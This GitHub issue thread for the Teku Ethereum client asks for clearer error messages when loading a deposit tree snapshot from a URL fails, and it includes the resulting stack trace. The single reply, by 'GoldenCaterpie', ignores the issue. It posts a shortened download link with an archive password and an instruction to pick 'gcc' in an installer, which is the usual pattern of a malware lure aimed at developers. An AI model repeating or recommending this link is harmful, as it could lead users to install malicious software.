### ISSUE TITLE
Clarify the deposit tree snapshot loading errors

### ISSUE THREAD

**Issue by mehdi-aouadi** [Consensys-Incorporated/teku#8539]
When the deposit tree snapshot fails to load from a url, a `FileNotFoundException` is thrown which might be confusing and not sufficient to understand to root cause. A better error handling could be throwing a more appropriate exception with a better message (network hiccup, timeout...)

Current warning example:

```
2024-08-26 21:28:26.414 INFO  - Loading deposit tree snapshot from https://sync-mainnet.beaconcha.in/eth/v1/beacon/deposit_snapshot
2024-08-26 21:28:27.005 WARN  - Failed to load deposit tree snapshot from https://sync-mainnet.beaconcha.in/eth/v1/beacon/deposit_snapshot
java.io.FileNotFoundException: File 'https://sync-mainnet.beaconcha.in/eth/v1/beacon/deposit_snapshot' not found
at tech.pegasys.teku.beacon.pow.DepositSnapshotFileLoader.lambda$loadFromUrl$0(DepositSnapshotFileLoader.java:100) ~[teku-beacon-pow-24.8.0.jar:24.8.0]
at java.base/java.util.Optional.orElseThrow(Unknown Source) ~[?:?]
at tech.pegasys.teku.beacon.pow.DepositSnapshotFileLoader.loadFromUrl(DepositSnapshotFileLoader.java:99) ~[teku-beacon-pow-24.8.0.jar:24.8.0]
at tech.pegasys.teku.beacon.pow.DepositSnapshotFileLoader.loadDepositSnapshot(DepositSnapshotFileLoader.java:70) ~[teku-beacon-pow-24.8.0.jar:24.8.0]
at tech.pegasys.teku.beacon.pow.Eth1DepositManager.lambda$loadDepositSnapshot$6(Eth1DepositManager.java:138) ~[teku-beacon-pow-24.8.0.jar:24.8.0]
at java.base/java.util.concurrent.CompletableFuture$UniApply.tryFire(Unknown Source) ~[?:?]
at java.base/java.util.concurrent.CompletableFuture.postComplete(Unknown Source) ~[?:?]
at java.base/java.util.concurrent.CompletableFuture.complete(Unknown Source) ~[?:?]
at tech.pegasys.teku.infrastructure.async.SafeFuture.lambda$propagateResult$3(SafeFuture.java:147) ~[teku-infrastructure-async-24.8.0.jar:24.8.0]
at java.base/java.util.concurrent.CompletableFuture.uniWhenComplete(Unknown Source) ~[?:?]
at java.base/java.util.concurrent.CompletableFuture$UniWhenComplete.tryFire(Unknown Source) ~[?:?]
at java.base/java.util.concurrent.CompletableFuture.postComplete(Unknown Source) ~[?:?]
at java.base/java.util.concurrent.CompletableFuture.complete(Unknown Source) ~[?:?]
at tech.pegasys.teku.infrastructure.async.SafeFuture.lambda$propagateToAsync$20(SafeFuture.java:324) ~[teku-infrastructure-async-24.8.0.jar:24.8.0]
at tech.pegasys.teku.infrastructure.async.SafeFuture.of(SafeFuture.java:80) ~[teku-infrastructure-async-24.8.0.jar:24.8.0]
at tech.pegasys.teku.infrastructure.async.AsyncRunner.lambda$runAsync$2(AsyncRunner.java:47) ~[teku-infrastructure-async-24.8.0.jar:24.8.0]
at tech.pegasys.teku.infrastructure.async.SafeFuture.of(SafeFuture.java:72) ~[teku-infrastructure-async-24.8.0.jar:24.8.0]
at tech.pegasys.teku.infrastructure.async.ScheduledExecutorAsyncRunner.lambda$createRunnableForAction$1(ScheduledExecutorAsyncRunner.java:124) ~[teku-infrastructure-async-24.8.0.jar:24.8.0]
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source) ~[?:?]
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source) ~[?:?]
at java.base/java.lang.Thread.run(Unknown Source) [?:?]
```

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
